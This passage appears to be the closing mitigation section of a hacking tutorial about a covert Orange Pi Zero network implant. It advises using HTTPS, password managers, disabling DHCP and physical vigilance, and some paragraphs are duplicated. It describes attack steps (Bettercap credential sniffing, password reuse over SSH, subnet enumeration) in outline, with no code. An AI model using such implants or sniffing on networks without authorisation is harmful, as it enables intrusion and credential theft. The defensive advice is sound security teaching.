: The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way in thwarting an attackers ability to compromise the network further. Use Passwords Managers : The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems.

: The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems. Disable DHCP : This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet. This would hinder the attackers able to access the network remotely. Disabling DHCP will only create an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.

: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet. This would hinder the attackers able to access the network remotely. Disabling DHCP will only create an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually. Be Alert: Be mindful of the people and devices authenticated to the router you're connecting to. It also doesn't hurt to inspect devices physically attached to the router occasionally. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries. Public networks like these are prime targets for hackers looking to compromise as many people and services as possible. Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements. Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions. Don't Miss: Intercept & Decrypt Windows Passwords on a Local Network

Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from ethical hacking professionals. Buy Now (90% off) >